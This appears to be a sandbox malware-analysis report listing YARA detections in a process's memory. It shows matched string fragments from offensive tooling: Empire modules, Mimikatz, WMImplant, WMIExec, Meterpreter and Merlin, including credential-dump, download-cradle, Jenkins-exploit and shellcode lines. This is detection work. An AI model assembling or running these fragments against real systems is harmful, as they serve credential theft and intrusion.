- 0x2bb0a4:$loader_export: ReflectiveLoader
- 0x2bb2c3:$loader_export: ReflectiveLoader
- 0x2bb342:$loader_export: ReflectiveLoader
- 0x2bb4a2:$loader_export: ReflectiveLoader
- 0x2bb4ff:$loader_export: ReflectiveLoader
- 0x2bba75:$loader_export: ReflectiveLoader
- 0x2bbb0f:$loader_export: ReflectiveLoader
- 0x2bbec1:$loader_export: ReflectiveLoader
- 0x2bbf2f:$loader_export: ReflectiveLoader
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Metasploit_Loader_RSMudge | Detects a Metasploit Loader by RSMudge - file loader.exe | Florian Roth | - 0x2bebd3:$s1: Could not resolve target
- 0x2bebf8:$s2: Could not connect to target
- 0x2bec20:$s3: %s [host] [port]
- 0x2bec3d:$s4: ws2_32.dll is out of date.
- 0x2bec64:$s5: read a strange or incomplete length value
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Armitage_msfconsole | Detects Armitage component | Florian Roth | - 0x2a4a32:$s1: \umeterpreter\u >
- 0x2a4a50:$s3: ^meterpreter >
- 0x2a4a6b:$s11: \umsf\u>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Armitage_OSX | Detects Armitage component | Florian Roth | - 0x2a4ecc:$x1: resources/covertvpn-injector.exe
- 0x2a4ef9:$s10: resources/browserpivot.x64.dll
- 0x2a4f24:$s17: resources/msfrpcd_new.bat
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth | - 0x2b575d:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0x2b826e:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
- 0x2b57dc:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | NTLM_Dump_Output | NTML Hash Dump output file - John/LC format | Florian Roth | - 0x2d432d:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE:
- 0x339e97:$s0: 500:AAD3B435B51404EEAAD3B435B51404EE:
- 0x2d435f:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
- 0x339ebf:$s1: 500:aad3b435b51404eeaad3b435b51404ee:
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_WMIExec_Gen_1 | Detects Invoke-WmiExec or Invoke-SmbExec | Florian Roth | - 0x2b8ae2:$x1: Invoke-WMIExec
- 0x2ba1c4:$x1: Invoke-WMIExec
- 0x2b8afe:$x2: $target_count = [System.math]::Pow(2,(($target_address.GetAddressBytes().Length * 8) - $subnet_mask_split))
- 0x2b8b76:$s1: Import-Module $PWD\Invoke-TheHash.ps1
- 0x2b8ba8:$s2: Import-Module $PWD\Invoke-SMBClient.ps1
- 0x2b8bdc:$s3: $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList
- 0x2b8c38:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
- 0x2ba2e8:$x4: Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_SMBExec_Invoke_WMIExec_1 | Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x2b8ef2:$s1: $process_ID = $process_ID -replace "-00-00",""
- 0x2b8f2d:$s2: Write-Output "$Target did not respond"
- 0x2b8f60:$s3: [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_WMIExec_Gen | Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1 | Florian Roth | - 0x2b928d:$s1: $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes)
- 0x2b92da:$s2: $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- 0x2b934d:$s3: $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PowerShdll | Detects hack tool PowerShdll | Florian Roth | - 0x2c6d1a:$x2: \PowerShdll.dll
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | WMImplant | Auto-generated rule - file WMImplant.ps1 | Florian Roth | - 0x2d3d7d:$x1: Invoke-ProcessPunisher -Creds $RemoteCredential
- 0x2d3db9:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x339b11:$x2: $Target -query "SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')
- 0x2d3e0f:$x3: WMImplant -Creds
- 0x2d3e2c:$x4: -Download -RemoteFile C:\passwords.txt
- 0x339b70:$x4: -Download -RemoteFile C:\passwords.txt
- 0x2d3e5f:$x5: -Command 'powershell.exe -command "Enable-PSRemoting
- 0x2d3ea0:$x6: Invoke-WMImplant
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | merlinAgent | Detects Merlin agent | Hilko Bengen | - 0x2be7bd:$x1: Command output:\x0D\x0A\x0D\x0A%s
- 0x2c1994:$x1: Command output:\x0D\x0A\x0D\x0A%s
- 0x2be7df:$x2: [-]Connecting to web server at %s to update agent configuration information.
- 0x2c19ac:$x2: [-]Connecting to web server at %s to update agent configuration information.
- 0x2be838:$x3: [-]%d out of %d total failed checkins
- 0x2c19fb:$x3: [-]%d out of %d total failed checkins
- 0x2be86a:$x4: [!}Unknown AgentControl message type received %s
- 0x2c1a23:$x4: [!}Unknown AgentControl message type received %s
- 0x2be8a7:$x5: [-]Received Agent Kill Message
- 0x2c1a56:$x5: [-]Received Agent Kill Message
- 0x2be8d2:$x6: [-]Received Server OK, doing nothing
- 0x2c1a77:$x6: [-]Received Server OK, doing nothing
- 0x2be903:$x7: [!]There was an error with the HTTP client while performing a POST:
- 0x2c1a9e:$x7: [!]There was an error with the HTTP client while performing a POST:
- 0x2be953:$x8: [-]Sleeping for %s at %s
- 0x2c1ae4:$x8: [-]Sleeping for %s at %s
- 0x2be978:$s1: Executing command %s %s %s
- 0x2c1aff:$s1: Executing command %s %s %s
- 0x2be99f:$s2: [+]Host Information:
- 0x2c1b1c:$s2: [+]Host Information:
- 0x2be9c0:$s3: \x09Hostname: %s
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_OSiRis | Osiris Device Guard Bypass - file Invoke-OSiRis.ps1 | Florian Roth | - 0x2cf0e3:$x1: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target
- 0x2cef9f:$x2: Invoke-OSiRis
- 0x2cf15e:$x2: Invoke-OSiRis
- 0x3367b4:$x2: Invoke-OSiRis
- 0x3368ee:$x2: Invoke-OSiRis
- 0x2cf178:$x3: -Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}
- 0x2cf1c6:$x4: Device Guard Bypass Command Execution
- 0x2cf1f8:$x5: -Put Payload in Win32_OSRecoveryConfiguration DebugFilePath
- 0x2cf0e3:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
- 0x2cf240:$x6: $null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Double_Base64_Encoded_Executable | Detects an executable that has been encoded with base64 twice | Florian Roth | - 0x2d059c:$: VFZwVEFRR
- 0x3376b5:$: VFZwVEFRR
- 0x2d05b2:$: RWcFRBUU
- 0x3376bf:$: RWcFRBUU
- 0x2d05c7:$: UVnBUQVFF
- 0x3376c8:$: UVnBUQVFF
- 0x2d05dd:$: VFZvQUFBQ
- 0x3376d2:$: VFZvQUFBQ
- 0x2d05f3:$: RWb0FBQU
- 0x3376dc:$: RWb0FBQU
- 0x2d0608:$: UVm9BQUFB
- 0x3376e5:$: UVm9BQUFB
- 0x2d061e:$: VFZxQUFBR
- 0x3376ef:$: VFZxQUFBR
- 0x2d0634:$: RWcUFBQU
- 0x3376f9:$: RWcUFBQU
- 0x2d0649:$: UVnFBQUFF
- 0x337702:$: UVnFBQUFF
- 0x2d065f:$: VFZwUUFBS
- 0x33770c:$: VFZwUUFBS
- 0x2d0675:$: RWcFFBQU
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth | - 0x2d0858:$s1: AEAAAAEQATpVT
- 0x33783c:$s1: AEAAAAEQATpVT
- 0x2d0872:$s2: AAAAAAAAAAoVT
- 0x33784c:$s2: AAAAAAAAAAoVT
- 0x2d088c:$s3: AEAAAAEAAAqVT
- 0x33785c:$s3: AEAAAAEAAAqVT
- 0x2d08a6:$s4: AEAAAAIAAQpVT
- 0x33786c:$s4: AEAAAAIAAQpVT
- 0x2d08c0:$s5: AEAAAAMAAQqVT
- 0x33787c:$s5: AEAAAAMAAQqVT
- 0x2d08da:$sh1: SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU
- 0x33788d:$sh1: SZk9WbgM1TEBibpBib1JHIlJGI09mbuF2Yg0WYyd2byBHIzlGaU
- 0x2d091a:$sh2: LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR
- 0x3378c4:$sh2: LlR2btByUPREIulGIuVncgUmYgQ3bu5WYjBSbhJ3ZvJHcgMXaoR
- 0x2d095a:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
- 0x3378fb:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Script_Base64_Blocks_Jun20_1 | Detects suspicious file with base64 encoded payload in blocks | Florian Roth | - 0x2d0ad9:$sa1: <script language=
- 0x3132a1:$sa1: <script language=
- 0x320c9a:$sa1: <script language=
- 0x337a00:$sa1: <script language=
- 0x366850:$sa1: <script language=
- 0x36fd86:$sa1: <script language=
- 0x2d0af7:$sb2: 41 41 41 22 2B 0D 0A 22 41 41 41
- 0x337a15:$sb2: 41 41 41 22 2B 0D 0A 22 41 41 41
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Reversed_Hacktool_Author | Detects a suspicious path traversal into a Windows folder | Florian Roth | - 0x2d0c6c:$x1: iwiklitneg
- 0x2d0c83:$x2: eetbus@
- 0x337b24:$x2: eetbus@
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_Base64_Encoded_Hacktool_Dev | Detects a suspicious base64 encoded keyword | Florian Roth | - 0x2d0dc5:$: QGdlbnRpbGtpd2
- 0x337be9:$: QGdlbnRpbGtpd2
- 0x2d0de0:$: BnZW50aWxraXdp
- 0x337bf8:$: BnZW50aWxraXdp
- 0x2d0dfb:$: AZ2VudGlsa2l3a
- 0x337c07:$: AZ2VudGlsa2l3a
- 0x2d0e16:$: QGhhcm1qMH
- 0x337c16:$: QGhhcm1qMH
- 0x2d0e2d:$: BoYXJtajB5
- 0x337c21:$: BoYXJtajB5
- 0x2d0e44:$: AaGFybWowe
- 0x337c2c:$: AaGFybWowe
- 0x2d0e5b:$: IEBzdWJ0ZW
- 0x337c37:$: IEBzdWJ0ZW
- 0x2d0e72:$: BAc3VidGVl
- 0x337c42:$: BAc3VidGVl
- 0x2d0e89:$: gQHN1YnRlZ
- 0x337c4d:$: gQHN1YnRlZ
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_MetasploitPayload | Detects Empire component - file Invoke-MetasploitPayload.ps1 | Florian Roth | - 0x2a7879:$s1: $ProcessInfo.Arguments="-nop -c $DownloadCradle"
- 0x2a78b6:$s2: $PowershellExe=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Exploit_Jenkins | Detects Empire component - file Exploit-Jenkins.ps1 | Florian Roth | - 0x2a7ac7:$s1: $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"
- 0x2ad7a6:$s1: $postdata="script=println+new+ProcessBuilder%28%27"+$($Cmd)+"
- 0x2a7b11:$s2: $url = "http://"+$($Rhost)+":"+$($Port)+"/script"
- 0x2a7b4f:$s3: $Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Get_SecurityPackages | Detects Empire component - file Get-SecurityPackages.ps1 | Florian Roth | - 0x2a7d4e:$s1: $null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)
- 0x2a7d8e:$s2: $EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_PowerDump | Detects Empire component - file Invoke-PowerDump.ps1 | Florian Roth | - 0x2a7fa4:$x16: $enc = Get-PostHashdumpScript
- 0x2a7fce:$x19: $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
- 0x2a8020:$x20: $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Install_SSP | Detects Empire component - file Install-SSP.ps1 | Florian Roth | - 0x2a8239:$s1: Install-SSP -Path .\mimilib.dll
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_ShellcodeMSIL | Detects Empire component - file Invoke-ShellcodeMSIL.ps1 | Florian Roth | - 0x2a8427:$s1: $FinalShellcode.Length
- 0x2a844a:$s2: @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)
- 0x2a8482:$s3: @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,
- 0x2a84b9:$s4: $TargetMethod.Invoke($null, @(0x11112222)) | Out-Null
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HKTL_Empire_PowerUp | Detects Empire component - file PowerUp.ps1 | Florian Roth | - 0x2a86a8:$x2: $PoolPasswordCmd = 'c:\windows\system32\inetsrv\appcmd.exe list apppool
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_Mimikatz_Gen | Detects Empire component - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x2a88b8:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2ae17e:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2c7e89:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2c84db:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x331583:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x331a71:$s1: = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
- 0x2a88e9:$s2: Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Get_GPPPassword | Detects Empire component - file Get-GPPPassword.ps1 | Florian Roth | - 0x2a8b1d:$s1: $Base64Decoded = [Convert]::FromBase64String($Cpassword)
- 0x2a8b62:$s2: $XMlFiles += Get-ChildItem -Path "\\$DomainController\SYSVOL" -Recurse
- 0x2ae372:$s2: $XMlFiles += Get-ChildItem -Path "\\$DomainController\SYSVOL" -Recurse
- 0x2a8bb5:$s3: function Get-DecryptedCpassword {
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_SmbScanner | Detects Empire component - file Invoke-SmbScanner.ps1 | Florian Roth | - 0x2a8d9f:$s1: $up = Test-Connection -count 1 -Quiet -ComputerName $Computer
- 0x2a8dea:$s2: $out | add-member Noteproperty 'Password' $Password
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Exploit_JBoss | Detects Empire component - file Exploit-JBoss.ps1 | Florian Roth | - 0x2a8e83:$s1: Exploit-JBoss
- 0x2a8fde:$s1: Exploit-JBoss
- 0x2ae5b6:$s1: Exploit-JBoss
- 0x2a8ff8:$s2: $URL = "http$($SSL)://" + $($Rhost) + ':' + $($Port)
- 0x2ae6a6:$s2: $URL = "http$($SSL)://" + $($Rhost) + ':' + $($Port)
- 0x2a9039:$s3: "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service
- 0x2ae6dd:$s3: "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service
- 0x2a9089:$s4: http://blog.rvrsh3ll.net
- 0x2a90ae:$s5: Remote URL to your own WARFile to deploy.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_dumpCredStore | Detects Empire component - file dumpCredStore.ps1 | Florian Roth | - 0x2a9298:$x1: [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW"
- 0x2ae886:$x1: [DllImport("Advapi32.dll", SetLastError = true, EntryPoint = "CredReadW"
- 0x2a92ed:$s12: [String] $Msg = "Failed to enumerate credentials store for user '$Env:UserName'"
- 0x2a934a:$s15: Rtn = CredRead("Target", CRED_TYPE.GENERIC, out Cred);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_EgressCheck | Detects Empire component - file Invoke-EgressCheck.ps1 | Florian Roth | - 0x2a954b:$s1: egress -ip $ip -port $c -delay $delay -protocol $protocol
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Out_Minidump | Detects Empire component - file Out-Minidump.ps1 | Florian Roth | - 0x2a9971:$s1: $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
- 0x2a99ba:$s2: $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_PsExec | Detects Empire component - file Invoke-PsExec.ps1 | Florian Roth | - 0x2a9bb1:$s1: Invoke-PsExecCmd
- 0x2a9bce:$s2: "[*] Executing service .EXE
- 0x2a9bf6:$s3: $cmd = "%COMSPEC% /C echo $Command ^> %systemroot%\Temp\
- 0x2aef18:$s3: $cmd = "%COMSPEC% /C echo $Command ^> %systemroot%\Temp\
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_PostExfil | Detects Empire component - file Invoke-PostExfil.ps1 | Florian Roth | - 0x2a9df5:$s1: # upload to a specified exfil URI
- 0x2a9e23:$s2: Server path to exfil to.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_SMBAutoBrute | Detects Empire component - file Invoke-SMBAutoBrute.ps1 | Florian Roth | - 0x2aa008:$s1: [*] PDC: LAB-2008-DC1.lab.com
- 0x2aa032:$s2: $attempts = Get-UserBadPwdCount $userid $dcs
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Get_Keystrokes | Detects Empire component - file Get-Keystrokes.ps1 | Florian Roth | - 0x2aa221:$s1: $RightMouse = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_DllInjection | Detects Empire component - file Invoke-DllInjection.ps1 | Florian Roth | - 0x2aa453:$s1: -Dll evil.dll
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_KeePassConfig | Detects Empire component - file KeePassConfig.ps1 | Florian Roth | - 0x2aa621:$s1: $UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_SSHCommand | Detects Empire component - file Invoke-SSHCommand.ps1 | Florian Roth | - 0x2aa861:$s1: $Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA
- 0x2af7a3:$s1: $Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA
- 0x2aa8a4:$s2: Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command "id"
- 0x2aa900:$s3: Write-Verbose "[*] Error loading dll"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen1 | Detects Empire component | Florian Roth | - 0x2aac6c:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2afa83:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2b57dc:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2b82e3:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2c7f83:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x331669:$s1: Write-BytesToMemory -Bytes $Shellcode
- 0x2aac9e:$s2: $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerUp_Gen | Detects Empire component - from files PowerUp.ps1, PowerUp.ps1 | Florian Roth | - 0x2aaee1:$s1: $Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath
- 0x2aaf33:$s2: $Result = sc.exe pause $($TargetService.Name)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen2 | Detects Empire component | Florian Roth | - 0x2ab2a7:$x1: $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
- 0x2ab325:$s20: #Shellcode: CallDllMain.asm
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Agent_Gen | Detects Empire component - from files agent.ps1, agent.ps1 | Florian Roth | - 0x2ab57c:$s1: $wc.Headers.Add("User-Agent",$script:UserAgent)
- 0x2ab5b8:$s2: $min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
- 0x2ab5fd:$s3: if ($script:AgentDelay -ne 0){
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen3 | Detects Empire component | Florian Roth | - 0x2ab903:$s1: if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
- 0x2ab95e:$s2: remote DLL injection
- 0x2b03ae:$s2: remote DLL injection
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_InveighRelay_Gen | Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1 | Florian Roth | - 0x2abb79:$s1: $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
- 0x2abbea:$s2: $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_KeePassConfig_Gen | Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1 | Florian Roth | - 0x2abe2a:$s1: $KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_Portscan_Gen | Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1 | Florian Roth | - 0x2ac05b:$s1: Test-Port -h $h -p $Port -timeout $Timeout
- 0x2ac092:$s2: 1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen4 | Detects Empire component | Florian Roth | - 0x2ac5e7:$s1: Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
- 0x2ac651:$s2: # Get a handle to the module specified
- 0x2ac684:$s3: $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
- 0x2ac6cb:$s4: $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1 | Florian Roth | - 0x2ac998:$s1: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle
- 0x2ac998:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
- 0x2aca15:$s2: $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_Invoke_Gen | Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1 | Florian Roth | - 0x2acd31:$s1: $Shellcode1 += 0x48
- 0x2acd51:$s2: $PEHandle = [IntPtr]::Zero
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Empire_PowerShell_Framework_Gen5 | Detects Empire component | Florian Roth | - 0x2acff4:$s1: if ($ExeArgs -ne $null -and $ExeArgs -ne '')
- 0x2ad02d:$s2: $ExeArgs = "ReflectiveExe $ExeArgs"
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Impacket_Tools_Generic_1 | Compiled Impacket Tools | Florian Roth | - 0x2b5364:$s1: bpywintypes27.dll
- 0x2b5382:$s2: hZFtPC
- 0x2b1fc7:$s3: impacket
- 0x2b21bb:$s3: impacket
- 0x2b23b0:$s3: impacket
- 0x2b2461:$s3: impacket
- 0x2b2587:$s3: impacket
- 0x2b2758:$s3: impacket
- 0x2b2814:$s3: impacket
- 0x2b2935:$s3: impacket
- 0x2b2af1:$s3: impacket
- 0x2b2cd1:$s3: impacket
- 0x2b2d82:$s3: impacket
- 0x2b2eb5:$s3: impacket
- 0x2b2f6a:$s3: impacket
- 0x2b3090:$s3: impacket
- 0x2b312c:$s3: impacket
- 0x2b3266:$s3: impacket
- 0x2b3440:$s3: impacket
- 0x2b34ef:$s3: impacket
- 0x2b3614:$s3: impacket
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Invoke_mimikittenz | Detects Mimikittenz - file Invoke-mimikittenz.ps1 | Florian Roth | - 0x2c4161:$x1: [mimikittenz.MemProcInspector]
- 0x32e8c3:$x1: [mimikittenz.MemProcInspector]
- 0x2c418c:$s1: PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |
- 0x2c4208:$s2: IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);
- 0x2c4293:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
- 0x32e9d7:$s3: &email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=
- 0x2c42d8:$s4: [DllImport("kernel32.dll", SetLastError = true)]
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_PowerSploit | Yara detected PowerSploit | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_UACMe | Yara detected UACMe UAC Bypass tool | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_Mimikatz_1 | Yara detected Mimikatz | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_Codoso_Ghost | Yara detected Codoso Ghost | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_Meterpreter | Yara detected Meterpreter | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security | |
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Meterpreter_Reverse_Tcp | Meterpreter reverse TCP backdoor in memory. Tested on Win7x64. | chort (@chort0) | - 0x154af9:$b: 4D 45 54 45 52 50 52 45 54 45 52 5F 55 41
- 0x167ac0:$b: 4D 45 54 45 52 50 52 45 54 45 52 5F 55 41
- 0x154b14:$c: 47 45 54 20 2F 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2F 31 2E 30
